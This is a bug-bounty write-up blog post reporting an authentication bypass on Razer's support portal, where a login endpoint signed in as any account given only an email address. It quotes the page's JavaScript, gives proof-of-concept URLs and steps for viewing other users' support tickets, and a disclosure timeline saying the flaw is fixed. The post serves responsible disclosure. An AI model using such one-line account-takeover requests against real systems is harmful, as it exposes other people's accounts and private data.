Exploiting magic links, critical bugs are one line away


~ 3 minute read
Crafted : 4 months ago Updated : 4 months ago
Tags:
#cybersecurity #websec #bug-bounty #writeup #vulnerability #smfd #covid2019

Hello, luvs,

I haven't blog for a while, we are facing a sad pandemic  ūüė∑so I've decided to create this to make an important announcement, and also entertain you with an interesting vulnerability I've found. please read the short intro.

 

Table of Contents

 

A short intro 

This post is gonna be short; it shows you the worlds shortest P1  which only means one thing, the bugs you are not finding are the bugs you are not looking for ! you hear this on twitter these days well here is the proof how right is it. Also, I want to announce we've made SMFD free for the current sad #COVID2019 situation. Please you can read the whole announcement here.  

Why Razer?

When I was a teenager, I had this cool razer mousepad and mouse and used it for playing pro-counter-strike :D, so I saw they have a bug bounty program on HackerOne, and for the sake of good past memory I gave it a shot, I found some interesting subdomains, and I've spent some time on the main app.

 

This issue is patched now so the links aren't going to work. While poking around I've found an interesting page, 

https://mysupport.razer.com/app/account

, it contains some interesting Javascript code:

var razerId = 'razer######';

if(razerId!==""){

$(".rn_DisplayName").text(razerId);

{


    var loginContactID = Number('20#####');



    if(loginContactID == 0)

    {

        window.RzSdk = function() {

        rz.init({

        client_id: '3acd8fd57cc5de89d69237a9726abd#######',

        scope: '',

        });

        rz.verify();

        };

        window.setInfo = function(info) {

        console.log(info)

        if(info.hasOwnProperty("error")){

            console.log("has error");

        }else{

            console.log(window.location.href);

            href="https://razer--tst1.custhelp.com/cc/Integration/RazerIDAuth/loginUserFromCP?"

            href+="account="+info["account"];

            href+="&firstname="+info["firstname"];

            href+="&lasttname="+info["lastname"];

            href+="&url="+window.location.href;



          window.location.href=href;

        }

        };

most notable is the endpoint:

https://razer--tst1.custhelp.com/cc/Integration/RazerIDAuth/loginUserFromCP

With the exciting name of "login User From CP," it seems to take few parameters, so I tried with an invalid parameter, and the application returned a regex error.

https://razer--tst1.custhelp.com/cc/Integration/RazerIDAuth/loginUserFromCP?account=h1


returns:

error:Pattern does not match: value 'h1' does not match pattern '^((([-_!#$%&'*+/=?^~{|}\w]+(.[.]?[-_!#$%&'+/=?^~`{|}\w]+))|("[^"]+"))@[0-9A-Za-z]+([-]+[0-9A-Za-z]+)(.[0-9A-Za-z]+([-]+[0-9A-Za-z]+))+[; ]*)$'; Contact.Emails[0].Address

`Interesting but this is just a partial code disclosure without security impact alone (rather than knowing how we can possibly bypass this)

so next I tried to enter my test username

https://razer--tst1.custhelp.com/cc/Integration/RazerIDAuth/loginUserFromCP?&account=0xsha%[email protected]

then I see a redirect to 

https://mysupport.razer.com/app/account/account_overview

but if we visit 

https://razer--tst1.custhelp.com

, it logs us in as the user who can create a case. During my current test, when you login using this link, we can not see support cases of the user (different DB ?), but you can trigger an email from the razer or open and view any cases created there without authentication.

  1. open a new clean browser and visit
     https://razer--tst1.custhelp.com/app/account/questions/incident_details/i_id/2753808 
    (It should ask for authentication)
  2. now visit PoC URL 
    https://razer--tst1.custhelp.com/cc/Integration/RazerIDAuth/loginUserFromCP?
    &account=0xsha%[email protected]
     (it should redirect you to razed-id but do not log in)
  3. visit
    https://razer--tst1.custhelp.com/app/account/questions/incident_details/i_id/2753###
    , We can see the ticket.

Finally, I checked the vulnerable path main domain 

https://mysupport.razer.com/cc/Integration/RazerIDAuth/loginUserFromCP?account=a

There we go one-liner p1

https://mysupport.razer.com/cc/Integration/RazerIDAuth/loginUserFromCP?account=email

https://mysupport.razer.com/cc/Integration/RazerIDAuth/[email protected]

I this point, I knew its a severe bug, so I report it, but it turns out it was a duplicate, found by @p3rr0he, also took the future and recover the correct primary support email username (brute force and contact pages, support subdomains are at least to few places to find.)

 

Here is how the final panel looked like. 

 

 

Timeline 

 

Feb 17th Reported Issue.

Feb 18th Nice find and good work on this; unfortunately, it's duplicate.

Mar 4th Issue Resolved.  


Okay, that's it what a beautiful bug!

#StaySafe #StayHome

0xSha

 

 

 

Assist me:
Buy Me a Coffee at ko-fi.com